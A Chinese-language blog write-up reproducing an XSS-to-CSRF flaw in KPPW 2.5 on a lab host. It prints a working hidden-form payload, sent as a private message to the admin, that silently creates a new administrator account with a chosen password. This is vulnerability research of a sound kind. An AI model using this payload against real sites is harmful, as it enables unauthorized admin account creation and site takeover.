C1imber's Blog

KPPW2.5XSS引起的CSRF

字数统计: 610阅读时长: 2 min
2018/01/12 Share

kppw2.5XSS漏洞分析与复现(可csrf)

漏洞说明

http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send

收件人填目标用户名,标题随便,内容没有转义 ,所以提交内容处可能存在xss,不过过滤了敏感标签和 onerror onload等事件。虽然不能加载js代码,但是还是可以注入html代码,可以用xss漏洞注入html代码触发csrf

漏洞利用

http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send

收件人填写admin(网站管理员),向管理员提交私信,内容为我们构造的html代码

<form action="http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=
" method="post">
    <input type=hidden name="edituid" value="">
    <input type=hidden name="fds[username]" value="qianlan">
    <input type=hidden name="fds[truename]" value="">
    <input type=hidden name="fds[phone]" value="">
    <input type=hidden name="fds[qq]" value="">
    <input type=hidden name="fds[indus_pid]" value="">
    <input type=hidden name="fds[indus_id]" value="">
    <input type=hidden name="fds[birthday]" value="">
    <input type=hidden name="fds[password]" value="newadmin">
    <input type=hidden name="fds[email]" value="x@q.c">
    <input type=hidden name="fds[group_id]" value="1">
    <input type="submit" name="is_submit" value="1">
</form>

mark
mark
http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=这个url是后台管理员添加用户的url,我们构造表单,action的值设为这个url,写几个隐藏表单诱使管理员去点击提交,就会以管理员的身份去添加一个新的管理员,当然这不是网站管理员的意愿,而是我们的

提交完成后退出当前网站用户,模拟管理员登陆查看私信,可以看到一个按钮,单单一个按钮,看到的人总会想着去点一下,当然这个按钮可以构造的更具有吸引力
mark
mark
当点击按钮过后,管理员就会在不知情的情况下发起添加用户的http请求去添加一个用户名为qianlan密码为newadmin的用户,当然这是我们构造的,看用户列表可以看到多了一个名为qianlan的用户,我们登陆一下可以成功进入后台,进行下一步的渗透
mark
mark
mark

CATALOG
  1. 1. kppw2.5XSS漏洞分析与复现(可csrf)
    1. 1.0.1. 漏洞说明
    2. 1.0.2. 漏洞利用